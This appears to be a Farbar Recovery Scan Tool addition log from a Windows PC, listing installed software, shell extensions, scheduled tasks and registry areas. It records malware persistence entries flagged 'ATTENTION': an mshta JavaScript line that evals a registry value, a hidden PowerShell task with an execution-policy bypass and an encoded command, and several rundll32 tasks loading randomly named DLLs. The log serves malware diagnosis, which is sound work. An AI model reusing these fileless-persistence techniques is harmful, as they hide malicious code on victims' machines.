Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version:  - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version:  - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version:  - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version:  - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version:  - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version:  - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth ™ II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door -  Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version:  - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version:  - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version:  - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version:  - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version:  - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version:  - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2014-05-12 10:49 - 2014-05-12 10:49 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: Media is not connected to internet.
